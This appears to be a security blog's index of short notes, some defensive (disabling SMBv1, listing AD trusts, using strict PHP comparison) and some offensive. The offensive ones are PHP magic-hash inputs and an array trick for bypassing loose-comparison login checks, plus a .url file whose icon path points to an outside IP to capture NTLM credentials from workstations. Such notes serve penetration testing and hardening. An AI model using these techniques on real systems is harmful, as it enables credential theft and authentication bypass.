BLOG
Disable SMBv1
Time to disable SMBv1 ! https://support.microsoft.com/en-gb/help/2696547/detect-enable-disable-smbv1-smbv2-smbv3-in-windows-and-windows-server Win 8 : Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol Win10 : Disable-WindowsOptionalFeature -Online...
Windows AD Trust Types
nltest /trusted_domains will produce the list of trusted domains and the relationship of the trust (birectionnal and so on ...)
SEPPMail cluster
when there is a cluster in SEPPMail The config sync is done via SSH with a Public Key. The username used is the clusterID If you need to connect to a device, use the key to logon
MD5 magics hashes
For PHP Loose comparison240610708 = 0e462097431906509019562988736854ximaz = 61529519452809720693702583126814 Other Magic hashes web site : https://www.whitehatsec.com/blog/magic-hashes/
PHP Loose compare
if == strcomp then replace with array=[]if String, replace with true All == should be replace with === to be sure to keep the type of data.
Provoc NTLM leak
generate a file toto.url with the following content [InternetShortcut] URL=https://www.google.com/ IconIndex=0 IconFile=\\1.2.3.4\leak\leak.ico Place the toto.url file on a sharedrive. Many workstations will try to get the ico file of the toto.url file,...